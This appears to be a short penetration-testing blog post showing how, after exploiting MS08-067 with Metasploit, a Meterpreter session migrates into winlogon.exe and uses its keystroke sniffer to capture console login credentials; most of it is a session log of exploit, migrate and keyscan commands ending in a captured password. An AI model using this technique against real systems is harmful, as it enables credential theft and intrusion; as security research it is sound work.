posted by HDM here

In my previous post, I described the keystroke sniffing capabilities of the Meterpreter payload. One of the key restrictions of this feature is that it can only sniff while running inside of a process with interactive access to the desktop. In the case of the MS08-067 exploit, we had to migrate into Explorer.exe in order to capture the logged-on user’s keystrokes.

While testing the keystroke sniffer, it occurred to me to migrate into the Winlogon.exe process instead. This process should have interactive access to the desktop, however when I tried to sniff the active user’s keystrokes this way, it was not successful. Although Winlogon could not access the logged-on desktop using GetAsyncKeyState, it can capture the username and password of anyone logging into the target’s console. The example below demonstrates this process:

msf exploit(ms08_067_netapi) > exploit
[*] Triggering the vulnerability…
[*] Sending stage (2650 bytes)
[*] Uploading DLL (75787 bytes)…
[*] Upload completed.
[*] Meterpreter session 1 opened

meterpreter > ps

Process list
============

PID Name Path
— —- —-
292 wscntfy.exe C:WINDOWSsystem32wscntfy.exe
316 Explorer.EXE C:WINDOWSExplorer.EXE
356 smss.exe SystemRootSystem32smss.exe
416 csrss.exe ??C:WINDOWSsystem32csrss.exe
440 winlogon.exe ??C:WINDOWSsystem32winlogon.exe
[ snip ]

meterpreter > migrate 440
[*] Migrating to 440…
[*] Migration completed successfully.

meterpreter > keyscan_start
Starting the keystroke sniffer…
[ wait for user login ]

meterpreter > keyscan_dump
Dumping captured keystrokes…
Administrator <Tab> s3cretp4ss <Return>